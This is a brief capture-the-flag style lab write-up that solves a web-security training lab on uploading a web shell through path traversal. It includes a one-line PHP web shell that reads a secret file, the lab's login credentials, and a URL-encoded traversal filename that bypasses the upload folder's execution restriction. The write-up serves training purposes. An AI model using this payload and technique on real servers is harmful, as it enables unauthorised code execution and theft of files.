8.3 Lab: Web shell upload via path traversal | 2024
This lab contains a vulnerable image upload function. The server is configured to prevent execution of user-supplied files, but this restriction can be bypassed by exploiting a secondary vulnerability | Karthikeyan Nagaraj
Description
This lab contains a vulnerable image upload function. The server is configured to prevent execution of user-supplied files, but this restriction can be bypassed by exploiting a secondary vulnerability.
To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret
. Submit this secret using the button provided in the lab banner.
You can log in to your own account using the following credentials: wiener:peter
Solution
- Create a file called
shell.php
which contains the following code<?php echo file_get_contents(‘/home/carlos/secret’); ?>
- Log in to your Account with
wiener:peter
- Upload
shell.php
, capture the Request, and change the value of the filename from shell.php to%2e%2e%2f/shell.php
and send the request. - Now, go to My-Account, right-click on the avatar, click Open in a new tab, change the location to /files/avatars/../shell.php, and send the request.
- If it is not working, then send it to Burpsuite, and you’ll see the secret code.
- Copy the code and paste it in the solution to solve the Lab.
A YouTube Channel for Cybersecurity Lab’s Poc and Write-ups
Telegram Channel for Free Ethical Hacking Dumps
Thank you for Reading!
Happy Ethical Hacking ~
Author: Karthikeyan Nagaraj ~ Cyberw1ng